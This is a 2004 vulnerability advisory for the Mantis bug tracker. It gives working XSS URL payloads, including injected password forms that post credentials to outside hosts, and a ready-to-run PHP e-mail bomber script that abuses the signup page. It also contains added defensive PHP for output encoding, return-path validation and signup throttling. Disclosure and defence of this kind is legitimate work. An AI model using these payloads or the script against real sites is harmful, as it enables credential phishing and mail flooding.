---------------------------------------------------------------------------
Multiple Vulnerabilities in Mantis Bugtracker
---------------------------------------------------------------------------
Author: Joxean Koret
Date: This year, 2004 :) between June and August
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mantis Bugtracker
Mantis is a web-based bug-tracking system. It is written in the PHP scripting language and requires the MySQL database and a web server.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Multiple Cross Site Scripting Vulnerabilities:
A1. The first vulnerability that I found is this: you can log in anonymously and, when you want to perform a privileged action, you need to re-login with a valid user. The previous URL is passed as the return parameter to the login_page.php script. This parameter is not correctly sanitized when it is shown/parsed, so we can put in any HTML/script code that we want. To try the first vulnerability, copy the following text and paste it into the location bar of your favourite web browser:
http://<site-with-mantis-bugtracker>/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform%20action=%22http://malicious.site.com/script.xxx%22%3EPlease%20type%20your%20password%20:%20%3Cinput%20type=%22password%22%20name=%22your_password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22Give%20me%20your%20password,%20please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr
A2. Register New User XSS Vulnerability
- The second XSS problem is in the script signup.php (for example, http://bugs.mantisbt.org/signup.php). This script registers a new user. The problem is that the script doesn't properly sanitize the passed e-mail address when showing/parsing it. This is the second XSS problem that I found. To test it, please follow these steps:
- Navigate to http://<site-with-mantis-bugtracker>/signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text: <iframe src=http://www.playboy.com></iframe> or <h1>Hi!</h1>
A3. Select Project XSS Vulnerability
------------------------------------
- I will not explain the problem because it is the same every time. Try the following URL please:
http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%3Cbr%3E%3Cform%20action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%3E%3Cinput%20type=submit%20%20value=%22login%22%20onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E
A4. Another XSS Vulnerability
- Try the following URL:
http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>
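All four findings above share one root cause: a request value (the return parameter, the e-mail address, the ref parameter, the query string) is echoed into the page without being encoded for the HTML context it lands in. The following is an added example written for this advisory, not Mantis code and not the vendor's fix: an output encoder, a validator that only accepts a same-site relative path for the return parameter, and two small render functions that stand in for what login_page.php and the signup confirmation page emit. All function and variable names here are my own, and the sample inputs are constructed from the A1 and A2 payloads.

```php
<?php
// Added example (not Mantis code): the defensive pattern the XSS findings
// above call for. Names are my own; inputs are constructed from the advisory.

// Encode a value for placement inside a double-quoted HTML attribute or in
// element text. ENT_QUOTES also encodes the single quote, so the helper is
// safe in either quoting style; the charset is fixed so invalid multibyte
// sequences are substituted rather than passed through.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only a same-site, path-relative return target. Anything carrying a
// scheme, a protocol-relative "//" prefix, a ".." segment, or characters
// outside the allowed set is replaced with the default page, so the
// parameter can neither smuggle markup nor redirect off-site.
function safe_return_path(?string $raw, string $default = 'index.php'): string
{
    if ($raw === null || $raw === '') {
        return $default;
    }
    if (preg_match('#^/?[A-Za-z0-9_./-]+(\?[A-Za-z0-9_=&%.-]*)?$#', $raw) !== 1) {
        return $default;
    }
    if (strpos($raw, '//') === 0 || strpos($raw, '..') !== false) {
        return $default;
    }
    return $raw;
}

// The hidden field a login page would emit for the return target: validate
// first, then encode on output. Each step alone is not enough.
function render_return_field(?string $raw): string
{
    $target = safe_return_path($raw);
    return '<input type="hidden" name="return" value="' . html_encode($target) . '">';
}

// The confirmation text a signup page would echo back for the e-mail field.
function render_signup_email(string $email): string
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return '<p>Invalid e-mail address.</p>';
    }
    return '<p>Confirmation sent to ' . html_encode($email) . '</p>';
}

// Constructed inputs: the opening of the A1 payload, and the A2 payload.
$hostile_return = urldecode('%22%3E%3Ch1%3EHello!%3C/h1%3E');
$hostile_email  = '<h1>Hi!</h1>';

echo render_return_field($hostile_return), "\n";
echo render_return_field('view_all_set.php?type=1'), "\n";
echo render_signup_email($hostile_email), "\n";
echo render_signup_email('user@example.com'), "\n";
```

Run it with the PHP CLI. The hostile return value fails the path validator and is replaced by the default page, while the legitimate relative URL is kept and attribute-encoded; the hostile e-mail never reaches the output encoder because it fails validation first, and the legitimate one is encoded before being echoed. Validation on input and encoding on output are kept as separate steps deliberately: the validator protects the redirect semantics, the encoder protects the HTML, and a value that legitimately contains a quote or angle bracket still renders harmlessly.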
----------------------------------------------
B. Possible E-Mail Bomber.
- That's fun! We can create a simple program that sends too many e-mails to the same e-mail address by simply changing the username. For example:
1.- Navigate to http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test0
3.- In the e-mail field type test@xxxxxxxx
4.- Send it.
1.- Navigate to http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test1
3.- In the e-mail field type test@xxxxxxxx
4.- Send it.
If you want to try the problem you can use the following simple script:
======================================================================
mantis-email-bomber.php
<?php
// Please change this address, because it is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
// Host name only; the scheme is added when the URL is built below
$site = "<site-with-mantis-bugtracker>";
for ($i = 0; $i <= 15; $i++)
{
    echo("Sending e-mail number $i\n");
    // A new username on every request, always the same e-mail address
    $user = "$base_user$i";
    echo("New user is $user\n");
    $url = "http://$site/signup.php?username=$user&email=$email";
    echo("URL is $url\n");
    // Requesting the signup script makes Mantis send a message to $email
    $fd = fopen($url, "r");
    echo("E-mail $i sent\n");
    fclose($fd);
}
?>
======================================================================
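The script above works because the signup handler sends a message for every request and never asks how many it has already sent to that address. The following is an added example, not Mantis code and not the fix the vendor committed: a throttle that counts confirmation messages sent per e-mail address and per source IP inside a sliding window, wired into a signup handler that shows the same page whether or not mail went out. The store is an in-memory array so the example runs stand-alone; a deployment would back it with a database table. Class, function and variable names, the limits, and the sample address and IP are all my own.

```php
<?php
// Added example (not Mantis code): throttle confirmation e-mails at signup.
// Names, limits and sample data are constructed for this illustration.

class SignupThrottle
{
    private array $events = [];   // bucket key => list of unix timestamps
    private int $windowSeconds;
    private int $maxPerEmail;
    private int $maxPerIp;

    public function __construct(int $windowSeconds = 3600, int $maxPerEmail = 3, int $maxPerIp = 10)
    {
        $this->windowSeconds = $windowSeconds;
        $this->maxPerEmail   = $maxPerEmail;
        $this->maxPerIp      = $maxPerIp;
    }

    // Drop timestamps that have fallen out of the window for one bucket.
    private function prune(string $key, int $now): void
    {
        $cutoff = $now - $this->windowSeconds;
        $this->events[$key] = array_values(array_filter(
            $this->events[$key] ?? [],
            fn(int $t) => $t > $cutoff
        ));
    }

    // Returns true and records the attempt if a message may be sent; returns
    // false, recording nothing, once either limit has been reached.
    public function allow(string $email, string $ip, ?int $now = null): bool
    {
        $now = $now ?? time();
        // Normalise so "Test@Example.COM" and "test@example.com" share a bucket.
        $emailKey = 'email:' . strtolower(trim($email));
        $ipKey    = 'ip:' . $ip;

        $this->prune($emailKey, $now);
        $this->prune($ipKey, $now);

        if (count($this->events[$emailKey]) >= $this->maxPerEmail
            || count($this->events[$ipKey]) >= $this->maxPerIp) {
            return false;
        }
        $this->events[$emailKey][] = $now;
        $this->events[$ipKey][]    = $now;
        return true;
    }
}

// The handler decides whether to send before doing any work. The page shown
// to the client is identical whether or not mail goes out, so the throttle
// does not become an oracle for which addresses are registered; the refusal
// is recorded server-side instead.
function handle_signup(SignupThrottle $throttle, string $username, string $email, string $ip, int $now): array
{
    $response = [
        'sent'    => false,
        'message' => 'If the address is valid, a confirmation message has been sent.',
    ];
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return $response;
    }
    if (!$throttle->allow($email, $ip, $now)) {
        error_log("signup throttled: email=$email ip=$ip user=$username");
        return $response;
    }
    // send_confirmation_mail($email) would be called here in a real handler.
    $response['sent'] = true;
    return $response;
}

// Constructed replay of the loop in the advisory's script: sixteen usernames,
// one address, one source, one second apart.
$throttle = new SignupThrottle(3600, 3, 10);
$start = 1700000000;
for ($i = 0; $i <= 15; $i++) {
    $r = handle_signup($throttle, "test$i", 'test@example.com', '203.0.113.7', $start + $i);
    echo sprintf("test%-2d mail sent: %s\n", $i, $r['sent'] ? 'yes' : 'no');
}
```

With the limits chosen here the first three requests send a message and the remaining thirteen are accepted without sending, each leaving an error_log entry that a defender can alert on. Throttled attempts are deliberately not counted, so a flood cannot lock a legitimate address out for longer than the window; the per-IP limit catches the same pattern spread across many addresses from one source.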
---------------------------------------------------------------------------
The fix:
~~~~~~~~
The vendor has been contacted and all the bugs are corrected in the CVS version at the sourceforge.net site.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es